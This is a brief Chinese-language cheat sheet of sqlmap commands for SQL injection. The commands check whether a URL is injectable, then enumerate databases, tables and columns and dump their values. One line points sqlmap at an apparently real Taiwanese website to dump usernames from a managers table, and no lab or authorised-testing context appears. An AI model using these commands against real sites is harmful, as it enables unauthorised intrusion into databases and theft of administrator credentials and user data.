sqlmap.py -u url 驗(yàn)證是否為注入點(diǎn)
sqlmap.py -u url --dbs 列出數(shù)據(jù)庫系統(tǒng)的數(shù)據(jù)庫
sqlmap.py -u url --tables -D db_name 列舉數(shù)據(jù)庫表
sqlmap.py -u url --columns -T table_name -D db_name 列舉數(shù)據(jù)庫表中的字段
sqlmap.py -u url --dump -C columns_name -T tables_name -D db_name 列舉出字段值
./sqlmap.py -u "http://www.calin.com.tw/ab.php?id=1&item_id=3" --dump -C username --columns -T managers_tw -D dbcalin
https://zhuanlan.zhihu.com/p/36336483
https://www.cnblogs.com/anka9080/p/sqlmap.html

image.png